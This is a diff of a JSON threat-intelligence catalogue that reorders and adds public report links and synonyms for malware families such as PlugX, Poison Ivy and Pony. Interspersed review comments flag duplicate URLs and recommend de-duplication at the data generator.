"https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/", - "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.secureworks.com/blog/bronze-president-targets-government-officials", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://asec.ahnlab.com/en/49097/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://twitter.com/xorhex/status/1399906601562165249?s=20", + "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", + "https://risky.biz/whatiswinnti/", + "https://www.youtube.com/watch?v=r1zAVX_HnJg", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", 
"https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited", - "https://www.secureworks.com/research/threat-profiles/bronze-president" + "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://www.youtube.com/watch?v=qEwBGGgWgOM", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://www.youtube.com/watch?v=IRh6R8o1Q7U", + "https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://www.contextis.com/en/blog/dll-search-order-hijacking", + "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/", + "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", + "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + 
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", + "https://engineers.ffri.jp/entry/2022/11/30/141346", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", + "https://attack.mitre.org/groups/G0001/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", + "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf", + "https://www.youtube.com/watch?v=E2_DTQJjDYc", + "https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/", + "https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-woodland", + "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/", + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/", + "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", + "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + 
"https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html", + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf", + "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://www.secureworks.com/research/threat-profiles/bronze-olive", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://attack.mitre.org/groups/G0096", + "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", + 
"http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "https://tracker.h3x.eu/info/290", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", + "https://www.secureworks.com/research/bronze-president-targets-ngos", + "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", + "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", + "https://www.youtube.com/watch?v=C_TmANnbS2k", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.secureworks.com/research/threat-profiles/bronze-president", + "https://www.macnica.net/file/security_report_20160613.pdf" ], "synonyms": [ "Destroy RAT", @@ -38073,8 +39874,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", - "https://attack.mitre.org/groups/G0024", - "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" + "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31", + "https://attack.mitre.org/groups/G0024" ], "synonyms": [], "type": [] 
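Review bot: The new refs list for this PlugX entry still carries near-duplicate entries that differ only by a trailing slash or by live-versus-archived copy — `https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia` and the same URL with a trailing `/`, `https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop` and its `/` variant, and the `go.contextis.com` PlugX payload-extraction PDF alongside its web.archive.org snapshot. The hunk is also almost entirely a reorder of existing refs, which buries the handful of genuinely new sources (the 2023 Recorded Future reports, the Check Point SmugX write-up, the Sekoia overview, the Carderbee and Lancefly posts) in roughly 180 lines of churn. If this cluster is produced by a generator from upstream data, as the wholesale reshuffle suggests, the fix belongs there: emit refs in a stable sorted order and de-duplicate after normalizing trailing slashes so the diff shows only real additions. If the list is hand-maintained, the duplicate pairs above can simply be collapsed to one entry each.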
@@ -38100,9 +39901,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown", - "https://twitter.com/cyb3rops/status/1129653190444703744", + "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html", "https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html", - "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html" + "https://twitter.com/cyb3rops/status/1129653190444703744" ], "synonyms": [ "Blitz", @@ -38119,11 +39920,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug", "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://content.fireeye.com/apt-41/rpt-apt41/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://securelist.com/apt-trends-report-q3-2020/99204/" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" ], "synonyms": [ "Barlaiy" 
@@ -38138,54 +39939,54 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", + "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://vblocalhost.com/uploads/VB2020-20.pdf", - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", - "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", - "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", - "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", - 
"http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://attack.mitre.org/groups/G0011", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", - "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", - "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://www.youtube.com/watch?v=1WfPlgtfWnQ", - "https://engineers.ffri.jp/entry/2022/11/30/141346", - "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", - "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", - "http://blogs.360.cn/post/APT_C_01_en.html", - "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", - 
"https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", - "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", - "https://unit42.paloaltonetworks.com/atoms/crawling-taurus/", - "https://community.riskiq.com/article/56fa1b2f", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://www.recordedfuture.com/china-linked-ta428-threat-group", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "http://blogs.360.cn/post/APT_C_01_en.html", + "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", + "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", + 
"https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://unit42.paloaltonetworks.com/atoms/crawling-taurus/", + "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", - "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" + "https://engineers.ffri.jp/entry/2022/11/30/141346", + "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", + "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", + "https://community.riskiq.com/article/56fa1b2f", + "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", + "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://attack.mitre.org/groups/G0011", + 
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "SPIVY", @@ -38216,8 +40017,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat", "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf", - "https://youtu.be/DDA2uSxjVWY?t=344", - "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://youtu.be/DDA2uSxjVWY?t=344" ], "synonyms": [ "KABOB", @@ -38247,9 +40048,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke", "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/", - "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock" ], "synonyms": [], "type": [] @@ -38275,10 +40076,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice", - "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/", - "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/" + "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/", + "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/" + ], + "synonyms": [ + "Chily" ], - "synonyms": [], "type": [] }, "uuid": "31017b7c-c023-4247-b37d-f15f2df5d25a", 
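Review bot: The rebuilt poison_ivy `refs` list keeps near-duplicate references that differ only by host: `https://vblocalhost.com/uploads/VB2020-20.pdf` next to `https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf`, and `https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf` next to `https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf`. Since the generator already rewrites the whole array, this is the place to canonicalise such URLs (one host per document) and drop the duplicate, otherwise every consumer of the cluster sees the same paper listed twice. This hunk spans several physical lines; the entry starts before it and continues past `"SPIVY"`.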
@@ -38289,28 +40092,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", - "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://github.com/nyx0/Pony", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.knowbe4.com/pony-stealer", - "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://www.youtube.com/watch?v=y8Z9KnL8s8s", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", - "https://github.com/nyx0/Pony", "http://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.knowbe4.com/pony-stealer", + "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", + "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://www.youtube.com/watch?v=42yldTQ-fWA", + 
"https://www.uperesia.com/analysis-of-a-packed-pony-downloader", + "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", - "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", - "https://www.youtube.com/watch?v=42yldTQ-fWA", - "https://intel471.com/blog/a-brief-history-of-ta505", - "http://www.secureworks.com/research/threat-profiles/gold-galleon", - "https://www.youtube.com/watch?v=EyDiIAt__dI", - "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf" + "https://intel471.com/blog/a-brief-history-of-ta505" ], "synonyms": [ "Fareit", @@ -38326,8 +40129,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/" ], "synonyms": [], "type": [] 
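Review bot: The new side of the pony `refs` list still carries scheme-only duplicates — `http://` and `https://` variants of the same secureworks `threat-profiles/gold-galleon`, `gold-essex` and `gold-evergreen` pages — plus the same intel471 article under two URLs (`https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` and `https://intel471.com/blog/a-brief-history-of-ta505`). Normalising the scheme to `https` and de-duplicating at ingest would remove six redundant entries and stop pointing readers at a plain-HTTP copy of a page that is also listed over TLS. The pony entry starts outside this hunk and continues past `"Fareit"`.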
@@ -38353,12 +40156,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb",
- "https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats",
 "https://securelist.com/apt-trends-report-q2-2018/86487/",
+ "https://asec.ahnlab.com/ko/18796/",
 "https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019",
 "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
- "https://asec.ahnlab.com/ko/18796/"
+ "https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -38384,9 +40187,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor",
 "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
 "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
- "https://www.cybereason.com/blog/research/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf"
+ "https://www.cybereason.com/blog/research/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector"
 ],
 "synonyms": [],
 "type": []
@@ -38425,21 +40228,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md", "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", - "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://paper.seebug.org/1301/", - "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", - "https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://github.com/nettitude/PoshC2_Python/", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/", + "https://redcanary.com/blog/getsystem-offsec/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://paper.seebug.org/1301/", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets", - "https://redcanary.com/blog/getsystem-offsec/" + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", + 
